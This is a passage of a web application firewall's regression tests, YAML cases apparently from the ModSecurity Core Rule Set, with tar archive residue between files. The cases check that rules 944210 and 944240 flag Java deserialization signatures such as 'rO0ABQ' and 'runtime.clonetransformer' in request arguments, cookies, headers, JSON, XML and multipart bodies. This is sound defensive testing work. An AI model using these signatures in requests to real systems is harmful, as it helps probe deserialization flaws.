"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"rO0ABQ\"}" output: log_contains: "id \"944210\"" - test_title: 944210-12 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"rO0ABQ\": \"test\"}" output: log_contains: "id \"944210\"" - test_title: 944210-13 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"rO0ABQ": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-14 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"rO0ABQ": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-15 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml rO0ABQ -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml rO0ABQ -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-17 desc: "Argument test includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=KztAAU" output: log_contains: "id \"944210\"" - test_title: 944210-18 desc: "Argument name includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "KztAAU=test" output: log_contains: "id \"944210\"" - test_title: 944210-19 desc: "Cookie test includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=KztAAU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-20 desc: "Cookie name includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: KztAAU=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-21 desc: "Request header test includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: KztAAU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-22 desc: "XML element includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944210\"" - test_title: 944210-23 desc: "XML attribute name includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944210\"" - test_title: 944210-24 desc: "XML attribute value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944210\"" - test_title: 944210-25 desc: "XML element value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "KztAAU" output: log_contains: "id \"944210\"" - test_title: 944210-26 desc: "Nested XML element value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "KztAAU" output: log_contains: "id \"944210\"" - test_title: 944210-27 desc: "Content-Type text/plain includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=KztAAU" output: log_contains: "id \"944210\"" - test_title: 944210-28 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"KztAAU\"}" output: log_contains: "id \"944210\"" - test_title: 944210-29 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"KztAAU\": \"test\"}" output: log_contains: "id \"944210\"" - test_title: 944210-30 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"KztAAU": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-31 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"KztAAU": "test\} -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-32 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml KztAAU -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml KztAAU -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-34 desc: "Argument test includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Cs7QAF" output: log_contains: "id \"944210\"" - test_title: 944210-35 desc: "Argument name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Cs7QAF=test" output: log_contains: "id \"944210\"" - test_title: 944210-36 desc: "Cookie test includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Cs7QAF method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-37 desc: "Cookie name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Cs7QAF=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-38 desc: "Request header test includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Cs7QAF method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-39 desc: "XML element includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944210\"" - test_title: 944210-40 desc: "XML attribute name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944210\"" - test_title: 944210-41 desc: "XML attribute value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944210\"" - test_title: 944210-42 desc: "XML element value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Cs7QAF" output: log_contains: "id \"944210\"" - test_title: 944210-43 desc: "Nested XML element value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Cs7QAF" output: log_contains: "id \"944210\"" - test_title: 944210-44 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Cs7QAF" output: log_contains: "id \"944210\"" - test_title: 944210-45 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Cs7QAF\"}" output: log_contains: "id \"944210\"" - test_title: 944210-46 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Cs7QAF\": \"test\"}" output: log_contains: "id \"944210\"" - test_title: 944210-47 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"Cs7QAF": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-48 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"Cs7QAF": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-49 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml Cs7QAF -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml Cs7QAF -----------------------------thisissparta-- output: log_contains: "id \"944210\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml��������0000664�0000000�0000000�00000222300�14461225151�0027667�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944240.yaml" description: "Positive tests for rule 944240" tests: - test_title: 944240-0 desc: "Argument test includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.clonetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-1 desc: "Argument name includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.clonetransformer=test" output: log_contains: "id \"944240\"" - test_title: 944240-2 desc: "Cookie test includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.clonetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-3 desc: "Cookie name includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.clonetransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-4 desc: "Request header test includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.clonetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-5 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-6 desc: "XML element value includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.clonetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-7 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 